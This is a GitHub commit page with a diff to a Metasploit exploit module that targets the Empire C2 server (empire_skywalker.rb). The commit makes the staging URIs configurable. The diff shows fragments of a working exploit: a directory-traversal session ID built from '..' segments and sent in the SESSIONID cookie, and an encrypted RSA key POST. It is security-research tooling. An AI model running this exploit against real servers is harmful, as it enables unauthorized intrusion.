Skip to content

Commit 684feb6

Browse files
author
wolfthefallen
committed
moved STAGE0 and STAGE1 into datastore
1 parent e806466 commit 684feb6

File tree

1 file changed

+8
-4
lines changed

1 file changed

+8
-4
lines changed

modules/exploits/linux/http/empire_skywalker.rb

Lines changed: 8 additions & 4 deletions
Original file line numberDiff line numberDiff line change
@@ -52,6 +52,8 @@ def initialize(info = {})
5252
[
5353
Opt::RPORT(8080),
5454
OptString.new('TARGETURI', [ false, 'Base URI path', '/' ]),
55+
OptString.new('STAGE0_URI', [ true, 'The resource requested by the initial launcher, default is index.asp', 'index.asp' ]),
56+
OptString.new('STAGE1_URI', [ true, 'The resource used by the RSA key post, default is index.jsp', 'index.jsp' ]),
5557
OptString.new('PROFILE', [ false, 'Empire agent traffic profile URI.', '' ])
5658
], self.class)
5759
end
@@ -113,11 +115,12 @@ def rsa_key_to_xml(rsa_key)
113115
end
114116

115117
def get_staging_key
116-
# empire STAGE0_URI index.asp
118+
# STAGE0_URI resource requested by the initial launcher
119+
# The default STAGE0_URI resource is index.asp
117120
# https://github.com/adaptivethreat/Empire/blob/293f06437520f4747e82e4486938b1a9074d3d51/setup/setup_database.py#L34
118121
res = send_request_cgi({
119122
'method' => 'GET',
120-
'uri' => normalize_uri(target_uri.path, 'index.asp')
123+
'uri' => normalize_uri(target_uri.path, datastore['STAGE0_URI'])
121124
})
122125
return unless res and res.code == 200
123126

@@ -193,13 +196,14 @@ def exploit
193196

194197
rsa_key = OpenSSL::PKey::RSA.new(2048)
195198
session_id = Array.new(50, '..').join('/')
196-
# empire STAGE1_URI index.asp
199+
# STAGE1_URI, The resource used by the RSA key post
200+
# The default STAGE1_URI resource is index.jsp
197201
# https://github.com/adaptivethreat/Empire/blob/293f06437520f4747e82e4486938b1a9074d3d51/setup/setup_database.py#L37
198202
res = send_request_cgi({
199203
'cookie' => "SESSIONID=#{session_id}",
200204
'data' => aes_encrypt(staging_key, rsa_key_to_xml(rsa_key)),
201205
'method' => 'POST',
202-
'uri' => normalize_uri(target_uri.path, 'index.jsp')
206+
'uri' => normalize_uri(target_uri.path, datastore['STAGE1_URI'])
203207
})
204208
fail_with(Failure::Unknown, 'Failed to send the RSA key') unless res and res.code == 200
205209
vprint_status("Successfully sent the RSA key")

0 commit comments

Comments
 (0)